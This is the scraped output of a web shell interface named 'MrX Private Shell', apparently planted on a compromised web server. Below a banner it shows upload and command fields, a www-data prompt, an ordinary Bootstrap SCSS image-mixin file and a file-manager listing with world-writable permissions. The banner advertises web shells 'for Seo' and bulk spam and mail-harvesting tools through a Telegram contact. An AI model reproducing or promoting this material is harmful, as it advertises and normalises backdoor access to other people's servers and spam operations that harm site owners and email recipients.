__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
// Image Mixins
// - Responsive image
// - Retina image


// Responsive image
//
// Keep images from scaling beyond the width of their parents.

@mixin img-fluid() {
  // Part 1: Set a maximum relative to the parent
  max-width: 100%;
  // Part 2: Override the height to auto, otherwise images will be stretched
  // when setting a width and height attribute on the img element.
  height: auto;
}


// Retina image
//
// Short retina mixin for setting background-image and -size.

@mixin img-retina($file-1x, $file-2x, $width-1x, $height-1x) {
  background-image: url($file-1x);

  // Autoprefixer takes care of adding -webkit-min-device-pixel-ratio and -o-min-device-pixel-ratio,
  // but doesn't convert dppx=>dpi.
  // There's no such thing as unprefixed min-device-pixel-ratio since it's nonstandard.
  // Compatibility info: https://caniuse.com/css-media-resolution
  @media only screen and (min-resolution: 192dpi), // IE9-11 don't support dppx
    only screen and (min-resolution: 2dppx) { // Standardized
    background-image: url($file-2x);
    background-size: $width-1x $height-1x;
  }
  @include deprecate("`img-retina()`", "v4.3.0", "v5");
}

Filemanager

Name Type Size Permission Actions
_alert.scss File 242 B 0777
_background-variant.scss File 695 B 0777
_badge.scss File 320 B 0777
_border-radius.scss File 1.79 KB 0777
_box-shadow.scss File 532 B 0777
_breakpoints.scss File 4.38 KB 0777
_buttons.scss File 3.44 KB 0777
_caret.scss File 1.39 KB 0777
_clearfix.scss File 93 B 0777
_deprecate.scss File 613 B 0777
_float.scss File 392 B 0777
_forms.scss File 5.68 KB 0777
_gradients.scss File 2 KB 0777
_grid-framework.scss File 2.04 KB 0777
_grid.scss File 2.04 KB 0777
_hover.scss File 757 B 0777
_image.scss File 1.13 KB 0777
_list-group.scss File 433 B 0777
_lists.scss File 170 B 0777
_nav-divider.scss File 369 B 0777
_pagination.scss File 462 B 0777
_reset-text.scss File 481 B 0777
_resize.scss File 202 B 0777
_screen-reader.scss File 827 B 0777
_size.scss File 148 B 0777
_table-row.scss File 794 B 0777
_text-emphasis.scss File 474 B 0777
_text-hide.scss File 326 B 0777
_text-truncate.scss File 168 B 0777
_transition.scss File 681 B 0777
_visibility.scss File 189 B 0777
Filemanager